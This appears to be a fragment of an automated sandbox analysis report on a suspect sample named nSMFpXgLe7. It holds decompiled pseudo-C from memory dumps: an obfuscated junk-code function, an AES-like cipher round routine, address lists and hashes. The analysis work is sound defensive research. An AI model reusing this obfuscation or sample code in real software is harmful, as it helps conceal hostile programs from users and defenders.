                  																							} else {
                  																								_pop( *0xe5c93576);
                  																								__edx = __edx |  *0xdeb1a31b;
                  																								 *0x1127f398 =  *0x1127f398 << 0x7a;
                  																								__eflags =  *0x1de89fc8 & __edi;
                  																								asm("sbb esi, [0xb1e65e37]");
                  																								__esp = __esp |  *0x3297a3a1;
                  																								asm("sbb al, 0x2");
                  																								__ebx = __ebx ^  *0x274c23cb;
                  																								__esp = __esp |  *0xe4f6715;
                  																								__edx = __edx - 1;
                  																								__ebx = __ebx & 0x9c913d01;
                  																								__eflags = 0xa5fd2725 -  *0xc35bfd;
                  																								asm("ror dword [0x17fffea9], 0x51");
                  																								__bh = __bh ^ 0x000000d2;
                  																								_pop(__edx);
                  																								__dh = __dh -  *0x15be5920;
                  																								__edi =  *0x977b2860 * 0x211;
                  																								__ecx =  *0x594cfc65;
                  																								asm("rcr dword [0xea7648be], 0x7a");
                  																								asm("adc al, [0x59320ae7]");
                  																								__esp = __esp -  *0x11be59fe;
                  																								__eflags = __esp;
                  																								asm("rol byte [0x922894c6], 0x82");
                  																								if(__esp > 0) {
                  																									goto L1;
                  																								} else {
                  																									__ecx = __ecx &  *0x4301ad77;
                  																									_t44 = __edi;
                  																									__edi =  *0x21d7e3bc;
                  																									 *0x21d7e3bc = _t44;
                  																									__edi =  *0x21d7e3bc +  *0x270b71f4;
                  																									asm("sbb esp, 0xc5ec1127");
                  																									 *0xcfae6a2b =  *0xcfae6a2b << 0xcb;
                  																									__eflags = 0xa5fd2725 -  *0xf6abaa23;
                  																									if(0xa5fd2725 <  *0xf6abaa23) {
                  																										goto L1;
                  																										do {
                  																											do {
                  																												do {
                  																													do {
                  																														goto L1;
                  																													} while ( *0xafc40dfd == 0);
                  																													 *0xebc88197 = 0xefaf7a74;
                  																													_t57 =  *0x47681ae5;
                  																													asm("sbb [0x9bf9180a], cl");
                  																													 *0x6e000829 =  *0x6e000829 & _t57;
                  																													_pop(_t72);
                  																													 *0xbcdb0205 =  *0xbcdb0205 << 0x54;
                  																													 *0x100d41d9 =  *0x100d41d9 << 0xb7;
                  																													_t47 = _t47 -  *0xcd788b2 ^  *0xa928b4de;
                  																													 *0x5059fccb =  *0x5059fccb >> 0xd2;
                  																													asm("scasb");
                  																													_t52 = _t52 - 0x00000001 & 0x3f13d796;
                  																													asm("rcr dword [0x58b262f7], 0xab");
                  																													asm("lodsb");
                  																													_t71 = _t72 +  *0x852a61ed;
                  																													_t60 = _t60 | 0x000000d2;
                  																													_pop( *0x21924e3e);
                  																													asm("adc cl, 0x10");
                  																													asm("rcl dword [0x4c35eeef], 0x3b");
                  																													 *0x77cee58d =  *0x77cee58d - _t63;
                  																													asm("ror dword [0x4461cb8e], 0x22");
                  																													asm("rcl byte [0xa98d480], 0xfc");
                  																													asm("rcr dword [0xc8d3bfd3], 0xf7");
                  																													 *0xb4c42b4 =  *0xb4c42b4 << 0x22;
                  																													_t68 = _t68 - 0x00000001 & 0xab098af3;
                  																												} while (_t68 > 0);
                  																												_t63 =  *0x8a97937f * 0x8912;
                  																											} while (_t63 >= 0);
                  																											 *0xe605fd79 =  *0xe605fd79 << 0x69;
                  																											asm("rcl byte [0xf0bcc80a], 0x6d");
                  																											_t47 = _t47 &  *0x4821fe6f;
                  																											_t60 =  *0x240a8aa2;
                  																											_t52 =  *0xb30f8f01;
                  																											_t63 =  *0xa3462f0d;
                  																											asm("adc cl, 0x8a");
                  																											asm("rol dword [0xeca4e60f], 0x9f");
                  																											 *0xaf93041a =  *0xaf93041a & _t47;
                  																											asm("adc edi, [0x39b85af3]");
                  																											asm("ror byte [0xe16eb810], 0x27");
                  																											 *0xf0083212 =  *0xf0083212 << 0x70;
                  																											_t68 = _t68 + 1 - 1;
                  																											L1();
                  																											 *0xb72b1fe8 =  *0xb72b1fe8 | _t63;
                  																										} while ( *0xb72b1fe8 <= 0);
                  																										asm("adc esi, [0x4eddc476]");
                  																										 *0xd02b2388 =  *0xd02b2388 << 0x13;
                  																										_push( *0xfc3d6009);
                  																										asm("adc edi, 0x8598a113");
                  																										 *0x71ad01e2 =  *0x71ad01e2 << 0x52;
                  																										asm("sbb [0xfd967721], ecx");
                  																										 *0xf6c0a2c7 =  *0xf6c0a2c7 + _t52;
                  																										asm("adc dl, 0xe3");
                  																										 *0x9454ca64 =  *0x9454ca64 | _t68;
                  																										L1();
                  																										 *0x942d2ce8 =  *0x942d2ce8 >> 0xd2;
                  																										asm("adc eax, [0xc90c34bd]");
                  																										asm("sbb edi, 0x5bfc46c2");
                  																										_push( *0x41029527);
                  																										asm("sbb edi, 0xfb350d8e");
                  																										 *0x4df446fe =  *0x4df446fe & _t68;
                  																										 *0xa9465ee0 =  *0xa9465ee0 - _t60;
                  																										_push(_t57 - 0x3414c9b);
                  																										asm("adc ah, [0x9931c2a8]");
                  																										_push(_t71 ^  *0xf415b894);
                  																										asm("rcl byte [0xa50173ca], 0xfb");
                  																										return  *0x6af824de & 0xa892a2c0 |  *0xf1aba502;
                  																									} else {
                  																										__esp = __esp -  *0x2f4e8872;
                  																										asm("rol dword [0x1527f3ee], 0x1d");
                  																										_push(0x7785b229);
                  																										__eflags = __ebp -  *0xff06ed1e;
                  																										 *0xe86f880d =  *0xe86f880d + __edx;
                  																										__edi = __edi +  *0xecfb760b;
                  																										__edi = __edi + 1;
                  																										asm("rcr dword [0x788d916c], 0xb3");
                  																										asm("adc eax, [0x11be59cc]");
                  																										__edi = __edi - 1;
                  																										__eflags = __esi -  *0x5253681f;
                  																										return __eax;
                  																									}
                  																								}
                  																							}
                  																						}
                  																					}
                  																				}
                  																			}
                  																		}
                  																	}
                  																}
                  															}
                  														}
                  													}
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  			}











                  0x01161506
                  0x0116150b
                  0x0116150c
                  0x01161512
                  0x01161518
                  0x0116151d
                  0x01161524
                  0x0116118d
                  0x0116118d
                  0x01161194
                  0x01161195
                  0x0116119c
                  0x0116152a
                  0x0116152a
                  0x01161534
                  0x0116153a
                  0x01161540
                  0x01161546
                  0x01161546
                  0x01161546
                  0x0116154c
                  0x0116154c
                  0x0116154c
                  0x01161552
                  0x01161555
                  0x01161556
                  0x0116155c
                  0x01161562
                  0x01161568
                  0x0116156e
                  0x01161574
                  0x0116157a
                  0x01161580
                  0x01161587
                  0x01161587
                  0x0116158d
                  0x00000000
                  0x01161593
                  0x01161593
                  0x0116159a
                  0x011615a1
                  0x011615a7
                  0x011615ae
                  0x011615b5
                  0x011615bf
                  0x011615c1
                  0x011615c7
                  0x011615ca
                  0x011615cd
                  0x011615d2
                  0x011615d8
                  0x011615d8
                  0x011615d8
                  0x011615de
                  0x011615e4
                  0x011615ea
                  0x011615ed
                  0x011615f4
                  0x011615fa
                  0x01161600
                  0x01161606
                  0x0116160c
                  0x0116160d
                  0x01161613
                  0x01161619
                  0x0116161c
                  0x01161622
                  0x01161628
                  0x0116162e
                  0x0116162e
                  0x01161638
                  0x00000000
                  0x0116163e
                  0x01161644
                  0x01161644
                  0x0116164a
                  0x01161650
                  0x01161656
                  0x0116165b
                  0x01161661
                  0x01161667
                  0x0116166e
                  0x0116166f
                  0x01161671
                  0x01161677
                  0x01161677
                  0x0116167d
                  0x01161683
                  0x01161683
                  0x01161689
                  0x01161690
                  0x01161690
                  0x01161690
                  0x01161696
                  0x00000000
                  0x0116169c
                  0x0116169c
                  0x0116169c
                  0x011616a2
                  0x00000000
                  0x011616a8
                  0x011616a8
                  0x011616b2
                  0x011616b8
                  0x011616be
                  0x011616c4
                  0x011616ca
                  0x011616d0
                  0x011616d7
                  0x011616dd
                  0x011616e3
                  0x011616e9
                  0x011616ef
                  0x011616f5
                  0x011616f8
                  0x011616fe
                  0x01161703
                  0x01161709
                  0x0116170a
                  0x01161710
                  0x01161716
                  0x0116171c
                  0x01161722
                  0x01161725
                  0x0116172b
                  0x0116172e
                  0x01161734
                  0x01161735
                  0x0116173b
                  0x01161740
                  0x01161746
                  0x0116174c
                  0x0116174c
                  0x01161752
                  0x00000000
                  0x01161758
                  0x01161758
                  0x0116175e
                  0x0116175f
                  0x01161760
                  0x01161766
                  0x0116176c
                  0x01161772
                  0x01161778
                  0x01161779
                  0x01161780
                  0x01161786
                  0x0116178b
                  0x01161791
                  0x01161791
                  0x01161797
                  0x0116179e
                  0x011617a3
                  0x011617a8
                  0x00000000
                  0x011617ae
                  0x011617ae
                  0x011617b3
                  0x011617b9
                  0x011617bf
                  0x011617c5
                  0x011617cb
                  0x011617cc
                  0x011617cf
                  0x011617d2
                  0x011617d8
                  0x011617de
                  0x011617de
                  0x011617e4
                  0x011617e5
                  0x011617eb
                  0x011617f1
                  0x011617f8
                  0x00000000
                  0x011617fe
                  0x011617fe
                  0x01161808
                  0x01161809
                  0x0116180f
                  0x01161815
                  0x0116181c
                  0x01161822
                  0x01161822
                  0x01161822
                  0x01161828
                  0x0116182e
                  0x01161834
                  0x0116183a
                  0x01161840
                  0x01161846
                  0x0116184d
                  0x0116184d
                  0x0116184e
                  0x00000000
                  0x01161854
                  0x01161854
                  0x0116185a
                  0x01161860
                  0x0116186a
                  0x01161871
                  0x01161877
                  0x0116187d
                  0x01161884
                  0x0116188a
                  0x01161890
                  0x01161896
                  0x01161899
                  0x0116189a
                  0x011618a0
                  0x011618a7
                  0x011618ae
                  0x011618b4
                  0x011618be
                  0x011618bf
                  0x011618c6
                  0x011618c6
                  0x011618cc
                  0x011618d2
                  0x011618d2
                  0x011618d9
                  0x011618da
                  0x00000000
                  0x011618e0
                  0x011618e0
                  0x011618e6
                  0x011618eb
                  0x011618f1
                  0x011618f7
                  0x011618fe
                  0x01161904
                  0x01161909
                  0x0116190a
                  0x01161910
                  0x01161910
                  0x01161916
                  0x0116191c
                  0x0116191d
                  0x00000000
                  0x01161923
                  0x01161923
                  0x01161929
                  0x0116192a
                  0x01161930
                  0x01161936
                  0x0116193c
                  0x01161942
                  0x01161942
                  0x01161942
                  0x01161948
                  0x0116194e
                  0x0116194f
                  0x01161956
                  0x01161956
                  0x0116195c
                  0x00000000
                  0x01161962
                  0x01161962
                  0x01161962
                  0x0116196c
                  0x00000000
                  0x01161972
                  0x01161972
                  0x01161978
                  0x0116197d
                  0x01161983
                  0x01161988
                  0x0116198e
                  0x01161995
                  0x0116199a
                  0x011619a4
                  0x011619a5
                  0x011619ab
                  0x011619ac
                  0x011619ad
                  0x011619b3
                  0x011619ba
                  0x011619c0
                  0x011619c6
                  0x011619cc
                  0x011619d2
                  0x011619d9
                  0x011619da
                  0x011619db
                  0x011619dc
                  0x011619e2
                  0x011619e7
                  0x011619ee
                  0x011619ef
                  0x011619f5
                  0x011619f8
                  0x011619f8
                  0x011619fe
                  0x01161a04
                  0x01161a0a
                  0x01161a0b
                  0x01161a12
                  0x01161a18
                  0x01161a1e
                  0x01161a24
                  0x01161a24
                  0x01161a2a
                  0x01161a30
                  0x00000000
                  0x01161a36
                  0x01161a36
                  0x01161a3c
                  0x01161a42
                  0x00000000
                  0x01161a48
                  0x01161a48
                  0x01161a4f
                  0x01161a54
                  0x01161a57
                  0x01161a59
                  0x01161a60
                  0x01161a66
                  0x01161a6c
                  0x01161a73
                  0x01161a79
                  0x01161a7b
                  0x01161a80
                  0x01161a86
                  0x01161a87
                  0x01161a8d
                  0x01161a93
                  0x01161a99
                  0x01161a9f
                  0x01161aa6
                  0x01161aac
                  0x01161ab2
                  0x01161ab3
                  0x01161aba
                  0x01161ac1
                  0x01161ac8
                  0x01161ac9
                  0x01161acb
                  0x01161acc
                  0x01161ad2
                  0x01161ad8
                  0x01161ade
                  0x01161ae5
                  0x01161ae5
                  0x01161aeb
                  0x01161aec
                  0x01161af2
                  0x01161af8
                  0x00000000
                  0x01161afe
                  0x01161afe
                  0x01161b04
                  0x01161b0e
                  0x01161b14
                  0x01161b1a
                  0x01161b20
                  0x01161b25
                  0x01161b2b
                  0x01161b31
                  0x01161b37
                  0x01161b38
                  0x01161b3e
                  0x01161b44
                  0x01161b4a
                  0x01161b50
                  0x01161b56
                  0x01161b59
                  0x01161b5f
                  0x01161b65
                  0x01161b6b
                  0x01161b71
                  0x01161b77
                  0x00000000
                  0x01161b7d
                  0x01161b7d
                  0x01161b87
                  0x01161b8c
                  0x01161b92
                  0x01161b93
                  0x01161b99
                  0x01161b9f
                  0x01161b9f
                  0x01161ba5
                  0x01161bab
                  0x01161bad
                  0x01161bb4
                  0x00000000
                  0x01161bba
                  0x01161bba
                  0x01161bc0
                  0x01161bc6
                  0x01161bcc
                  0x01161bcc
                  0x01161bcc
                  0x01161bd2
                  0x01161bd8
                  0x01161bdf
                  0x01161be5
                  0x01161beb
                  0x01161bf1
                  0x01161bf7
                  0x01161bfd
                  0x01161bff
                  0x01161c05
                  0x01161c0c
                  0x01161c12
                  0x01161c19
                  0x01161c1f
                  0x01161c24
                  0x01161c2a
                  0x01161c30
                  0x01161c33
                  0x01161c33
                  0x01161c39
                  0x00000000
                  0x01161c3f
                  0x01161c3f
                  0x01161c45
                  0x01161c45
                  0x01161c4b
                  0x01161c51
                  0x00000000
                  0x01161c57
                  0x01161c57
                  0x01161c5d
                  0x01161c63
                  0x01161c6a
                  0x01161c70
                  0x01161c76
                  0x01161c7c
                  0x01161c7e
                  0x01161c84
                  0x01161c8a
                  0x01161c8b
                  0x01161c91
                  0x01161c97
                  0x01161c9e
                  0x01161ca1
                  0x01161ca2
                  0x01161ca8
                  0x01161cb2
                  0x01161cb8
                  0x01161cbf
                  0x01161cc5
                  0x01161cc5
                  0x01161ccb
                  0x01161cd2
                  0x00000000
                  0x01161cd8
                  0x01161cd8
                  0x01161cde
                  0x01161cde
                  0x01161cde
                  0x01161ce4
                  0x01161cea
                  0x01161cf0
                  0x01161cf7
                  0x01161cfd
                  0x00000000
                  0x0116118d
                  0x0116118d
                  0x0116118d
                  0x0116118d
                  0x00000000
                  0x00000000
                  0x011611b6
                  0x011611bc
                  0x011611c2
                  0x011611ce
                  0x011611d4
                  0x011611d5
                  0x011611dc
                  0x011611e3
                  0x011611e9
                  0x011611f0
                  0x011611f2
                  0x011611f8
                  0x011611ff
                  0x01161200
                  0x0116120c
                  0x0116120f
                  0x01161215
                  0x01161218
                  0x01161220
                  0x01161226
                  0x0116122d
                  0x01161234
                  0x0116123b
                  0x01161242
                  0x01161242
                  0x0116124e
                  0x0116124e
                  0x0116125e
                  0x0116126b
                  0x01161272
                  0x01161279
                  0x0116127f
                  0x01161285
                  0x0116128b
                  0x0116128e
                  0x01161295
                  0x0116129b
                  0x011612a1
                  0x011612a8
                  0x011612af
                  0x011612b0
                  0x011612b5
                  0x011612b5
                  0x011612c1
                  0x011612cc
                  0x011612d9
                  0x011612eb
                  0x011612f7
                  0x011612fe
                  0x01161304
                  0x0116131d
                  0x0116132b
                  0x01161334
                  0x01161339
                  0x01161342
                  0x0116134b
                  0x01161351
                  0x0116135d
                  0x01161363
                  0x01161369
                  0x01161375
                  0x01161376
                  0x01161382
                  0x01161389
                  0x01161396
                  0x01161d03
                  0x01161d03
                  0x01161d09
                  0x01161d10
                  0x01161d11
                  0x01161d17
                  0x01161d1d
                  0x01161d23
                  0x01161d24
                  0x01161d2b
                  0x01161d31
                  0x01161d32
                  0x01161d38
                  0x01161d38
                  0x01161cfd
                  0x01161cd2
                  0x01161c51
                  0x01161c39
                  0x01161bb4
                  0x01161b77
                  0x01161af8
                  0x01161a42
                  0x01161a30
                  0x0116196c
                  0x0116195c
                  0x0116191d
                  0x011618da
                  0x0116184e
                  0x011617f8
                  0x011617a8
                  0x01161752
                  0x011616a2
                  0x01161696
                  0x01161638
                  0x0116158d

                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c18596104b0f5fa3086f2e993b1f960c5607d31709c2d074459f2c6cc4c82db2
                  • Instruction ID: fb696e1be614b31489d0e7590aa3d12761543927cef419c9401e84b348a38c44
                  • Opcode Fuzzy Hash: c18596104b0f5fa3086f2e993b1f960c5607d31709c2d074459f2c6cc4c82db2
                  • Instruction Fuzzy Hash: 70327332918791DFCB16DF38C88AA813FB5F796320B09434EC9A1976E1D7752529CF84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E011446E7(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				void* _t273;
                  				signed int _t274;
                  				signed int _t282;
                  				signed int* _t358;
                  				signed int _t383;
                  				signed int* _t409;
                  				signed int _t429;
                  				signed int _t458;
                  				signed int _t478;
                  				signed int _t560;
                  				signed int _t603;
                  
                  				_t273 = __eax;
                  				asm("ror edi, 0x8");
                  				asm("rol edx, 0x8");
                  				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                  				asm("ror ebx, 0x8");
                  				asm("rol edx, 0x8");
                  				_v20 = _t458;
                  				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                  				asm("ror ebx, 0x8");
                  				asm("rol edx, 0x8");
                  				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                  				asm("ror esi, 0x8");
                  				asm("rol edx, 0x8");
                  				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                  				asm("ror edx, 0x10");
                  				asm("ror esi, 0x8");
                  				asm("rol esi, 0x8");
                  				_v24 = _t282;
                  				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                  				asm("ror esi, 0x10");
                  				asm("ror ebx, 0x8");
                  				asm("rol ebx, 0x8");
                  				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                  				asm("ror ebx, 0x8");
                  				asm("ror edi, 0x10");
                  				asm("rol edi, 0x8");
                  				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                  				asm("ror edi, 0x10");
                  				asm("ror ebx, 0x8");
                  				asm("rol ebx, 0x8");
                  				_t409 =  &(__ecx[8]);
                  				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                  				_t478 = (_a4 >> 1) - 1;
                  				_a4 = _t478;
                  				if(_t478 != 0) {
                  					do {
                  						asm("ror edi, 0x10");
                  						asm("ror ebx, 0x8");
                  						asm("rol ebx, 0x8");
                  						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                  						asm("ror edi, 0x10");
                  						asm("ror ebx, 0x8");
                  						asm("rol ebx, 0x8");
                  						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                  						asm("ror ebx, 0x8");
                  						asm("ror edi, 0x10");
                  						asm("rol edi, 0x8");
                  						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                  						asm("ror edi, 0x10");
                  						asm("ror edx, 0x8");
                  						asm("rol edx, 0x8");
                  						_v24 = _t383;
                  						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                  						asm("ror edx, 0x10");
                  						asm("ror esi, 0x8");
                  						asm("rol esi, 0x8");
                  						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                  						asm("ror esi, 0x10");
                  						asm("ror ebx, 0x8");
                  						asm("rol ebx, 0x8");
                  						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                  						_v12 = _t560;
                  						asm("ror edi, 0x8");
                  						asm("ror ebx, 0x10");
                  						asm("rol ebx, 0x8");
                  						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                  						asm("ror ebx, 0x10");
                  						asm("ror edi, 0x8");
                  						asm("rol edi, 0x8");
                  						_t409 =  &(_t409[8]);
                  						_t205 =  &_a4;
                  						 *_t205 = _a4 - 1;
                  						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                  					} while ( *_t205 != 0);
                  				}
                  				asm("ror ebx, 0x8");
                  				asm("rol edi, 0x8");
                  				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                  				asm("ror ebx, 0x8");
                  				asm("rol edi, 0x8");
                  				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                  				asm("ror ebx, 0x8");
                  				asm("rol edi, 0x8");
                  				_t358 = _a8;
                  				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                  				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                  				asm("ror ecx, 0x8");
                  				asm("rol edi, 0x8");
                  				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                  				return _t274;
                  			}



















                  0x011446e7
                  0x011446f6
                  0x011446ff
                  0x0114470d
                  0x01144711
                  0x0114471a
                  0x0114472b
                  0x0114472e
                  0x01144733
                  0x0114473c
                  0x0114474a
                  0x0114474f
                  0x01144758
                  0x01144768
                  0x01144788
                  0x0114478b
                  0x0114479d
                  0x011447a2
                  0x011447b7
                  0x011447d4
                  0x011447d7
                  0x011447e8
                  0x011447fd
                  0x0114481d
                  0x01144820
                  0x01144832
                  0x01144850
                  0x0114486d
                  0x01144870
                  0x01144882
                  0x01144897
                  0x0114489d
                  0x011448a5
                  0x011448a6
                  0x011448a9
                  0x011448b7
                  0x011448c7
                  0x011448d9
                  0x011448eb
                  0x01144907
                  0x0114491a
                  0x01144927
                  0x01144938
                  0x0114494f
                  0x01144971
                  0x01144974
                  0x01144985
                  0x011449a0
                  0x011449b7
                  0x011449ba
                  0x011449cc
                  0x011449d4
                  0x011449e9
                  0x01144a06
                  0x01144a09
                  0x01144a1a
                  0x01144a3e
                  0x01144a4e
                  0x01144a51
                  0x01144a63
                  0x01144a7b
                  0x01144a7e
                  0x01144a91
                  0x01144a9e
                  0x01144ab0
                  0x01144ac8
                  0x01144aeb
                  0x01144aee
                  0x01144b00
                  0x01144b15
                  0x01144b1b
                  0x01144b1b
                  0x01144b1e
                  0x01144b1e
                  0x011448b7
                  0x01144b82
                  0x01144b8b
                  0x01144b99
                  0x01144bf7
                  0x01144c00
                  0x01144c0e
                  0x01144c70
                  0x01144c79
                  0x01144c86
                  0x01144c89
                  0x01144cd5
                  0x01144ce1
                  0x01144cea
                  0x01144cf7
                  0x01144cfe

                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                  • Instruction ID: 5b24ed9ac3c7bb11b6771bda604417adfdfef5bf9539f202749650a47f621a66
                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
